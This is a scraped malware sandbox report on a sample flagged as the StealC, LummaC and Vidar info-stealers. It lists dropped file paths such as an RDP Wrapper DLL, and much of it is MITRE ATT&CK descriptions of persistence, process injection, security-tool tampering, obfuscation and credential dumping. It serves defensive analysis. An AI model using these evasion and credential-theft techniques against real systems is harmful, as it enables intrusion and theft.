Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\RDP Wrapper\rdpwrap.dll

C:\Program Files\RDP Wrapper\rdpwrap.ini

C:\ProgramData\AEBAFBGIDHCB\AAFIJK

C:\ProgramData\AEBAFBGIDHCB\AEBAFB

C:\ProgramData\AEBAFBGIDHCB\DGHJEH

C:\ProgramData\AEBAFBGIDHCB\FCFBFB

Windows Analysis Report
file.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre